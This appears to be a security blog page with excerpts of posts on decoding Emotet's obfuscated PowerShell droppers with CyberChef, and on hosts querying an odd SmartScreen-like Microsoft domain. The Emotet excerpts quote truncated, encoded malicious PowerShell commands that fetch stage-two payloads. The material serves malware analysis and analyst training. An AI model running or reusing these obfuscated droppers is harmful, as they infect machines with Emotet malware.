Security Magic

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could just simply run these through a sandbox, but I like to really understand the obfuscation for my self.  Which is why I take the time to reverse it a little bit, and to share how I go about it. I will say that since I started using Cyber Chef , it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known emotet encodings that I've observed and then decode them. I was up to version 8 of my script, I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster method for "writing" a decoder of sorts. So, the new variant I had observed looks like this: powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '[R]VDbagIxEP2VfQhEsZv0oVAwLA...

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links. I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise. The powershell command is encoded as: POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit, unsuccessfully as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header: For example: 252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b0061007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f006d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f006e007300 Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain.  So I did some digging and the results for this ranged wildly: A Patent for reputation based software patentimages.storage.googleapis.com/pdfs/US8695092.pdf A suggestion that this is part of a Canon printer https://translate.googl...